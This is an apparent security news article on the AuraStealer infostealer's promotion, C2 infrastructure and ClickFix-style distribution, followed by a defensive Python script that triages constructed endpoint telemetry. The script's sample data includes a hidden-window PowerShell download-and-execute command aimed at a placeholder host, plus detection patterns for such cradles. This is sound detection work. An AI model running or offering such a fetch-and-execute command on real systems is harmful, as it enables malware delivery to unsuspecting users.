AuraStealer, a new and potent information-stealing malware, has been an active threat since mid-2025. This malicious software, developed and maintained by a group of Russian-speaking hackers, was first offered on underground forums following the disruption of the Lumma stealer infrastructure.
Emergence and Promotion of AuraStealer
First appearing on the XSS forum in July 2025 under the alias ‘AuraCorp,’ AuraStealer was marketed as a direct rival to LummaC2. The malware was promoted with a detailed post outlining its features and subscription model. Subsequently, it was advertised on multiple forums, expanding its presence across various platforms including Exploit and Darkmarket.
The developers claim that AuraStealer can extract data from over 110 browsers, more than 70 applications, and over 250 browser extensions, highlighting its extensive threat potential. This broad-reaching capability is a significant concern for cybersecurity experts.
Command-and-Control Infrastructure
Intrinsec analysts have identified that AuraStealer operates using an elaborate command-and-control (C2) framework. They discovered 48 C2 domains linked to its operations, with the threat actors utilizing cost-effective .SHOP and .CFD domains. To obscure their infrastructure, all traffic is routed through Cloudflare, complicating efforts to trace the true server locations.
Recent analyses indicate a shift from .SHOP to .CFD domains, suggesting an evolving operation. The malware’s management panel offers comprehensive features for subscribers, including campaign management tools and Telegram bot integration.
Distribution Methods and Security Recommendations
AuraStealer predominantly exploits social engineering tactics, such as the ClickFix technique. Noteworthy campaigns in October 2025 involved malicious TikTok videos masquerading as software activation tutorials, effectively tricking users into executing harmful commands via PowerShell.
In addition to TikTok lures, the malware is disseminated through various loaders and downloaders. Techniques include injecting AuraStealer into legitimate Windows processes and using tools such as Visual Basic scripts and Donut shellcode loaders. Effective security measures include blocking unauthorized PowerShell execution and detecting process injection attempts.
To mitigate the risks posed by AuraStealer, organizations should block the known C2 domains and provide training to help employees recognize social engineering attacks. Implementing application allow-listing and restricting administrative access can further protect against potential infections.
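The two recommendations above (flagging unauthorized PowerShell launches, and blocking or reviewing traffic to the operators' C2 domains) can be turned into a small triage pass over endpoint telemetry. The script below is an added example, not code from the original article or from Intrinsec; it runs over constructed Sysmon-style process-creation and DNS records embedded inline. The blocklist entries, domain names, process IDs and command lines are all constructed placeholders (the real C2 domains are in the Intrinsec report, not on this page), and the two-trait threshold for PowerShell events is an assumption chosen so that a visible, interactive admin session is not flagged on its own.

```python
"""Triage constructed endpoint telemetry for ClickFix-style PowerShell launches
and for DNS lookups of known or lookalike AuraStealer C2 domains."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed placeholder blocklist; populate from the Intrinsec indicators in practice.
C2_BLOCKLIST = {"example-c2-placeholder.shop", "example-c2-placeholder.cfd"}
# TLDs the article reports the operators favour; worth a review queue, not an outright block.
SUSPECT_TLDS = (".shop", ".cfd")

POWERSHELL_NAMES = {"powershell.exe", "pwsh.exe"}
# Command-line traits typical of a lure pasted into the Run dialog rather than typed by an admin.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
ENCODED_CMD = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)
EXEC_VERBS = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
FETCH_VERBS = re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I)


@dataclass
class Finding:
    source: str      # what was flagged (process id or "image -> domain")
    reasons: list    # human-readable reasons, one per matched trait


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_process(event: dict) -> Optional[Finding]:
    """Flag a PowerShell launch only when two or more suspicious traits coincide."""
    if _basename(event["Image"]) not in POWERSHELL_NAMES:
        return None
    cmd = event["CommandLine"]
    reasons = []
    if _basename(event["ParentImage"]) == "explorer.exe":
        reasons.append("launched from explorer.exe (Run dialog or double-click, not a service or task)")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window")
    if ENCODED_CMD.search(cmd):
        reasons.append("encoded command")
    if EXEC_VERBS.search(cmd) and FETCH_VERBS.search(cmd):
        reasons.append("download-and-execute cradle")
    # Assumed threshold: a single trait (e.g. a visible admin console) is not enough to alert.
    return Finding(event["ProcessId"], reasons) if len(reasons) >= 2 else None


def score_dns(query: dict) -> Optional[Finding]:
    """Exact/subdomain match against the blocklist; cheap C2 TLDs go to review."""
    name = query["QueryName"].lower().rstrip(".")
    reasons = []
    if name in C2_BLOCKLIST or any(name.endswith("." + d) for d in C2_BLOCKLIST):
        reasons.append("matches C2 blocklist")
    elif name.endswith(SUSPECT_TLDS):
        reasons.append("uses a TLD favoured by AuraStealer C2 (.shop/.cfd); review, do not auto-block")
    return Finding(f"{query['Image']} -> {name}", reasons) if reasons else None


def triage(process_events, dns_events):
    """Run both detectors and return every finding."""
    findings = [f for f in map(score_process, process_events) if f]
    findings += [f for f in map(score_dns, dns_events) if f]
    return findings


# Constructed sample telemetry (Sysmon event 1 / event 22 shaped); nothing here is a real indicator.
SAMPLE_PROCESS_EVENTS = [
    {"ProcessId": "4120",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     # constructed ClickFix-style launch: hidden window plus fetch-and-execute, placeholder host
     "CommandLine": 'powershell -w hidden -nop -c "iex (irm http://example-c2-placeholder.shop/v)"'},
    {"ProcessId": "5012",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     # benign scheduled-task script: one trait at most, must not alert
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"ProcessId": "5300", "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
]
SAMPLE_DNS_EVENTS = [
    {"Image": "powershell.exe", "QueryName": "example-c2-placeholder.shop"},
    {"Image": "chrome.exe", "QueryName": "www.example.com"},
    {"Image": "powershell.exe", "QueryName": "cdn-update-placeholder.cfd"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_PROCESS_EVENTS, SAMPLE_DNS_EVENTS):
        print(finding.source, "|", "; ".join(finding.reasons))
```

The process detector deliberately keys on the combination of traits (an explorer.exe parent, a hidden window, an encoded command, a fetch-and-execute pair) rather than on any one of them, because each alone is common in legitimate administration; the DNS detector separates hard blocklist hits from the softer .shop/.cfd heuristic so that the latter feeds a review queue instead of a block rule.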
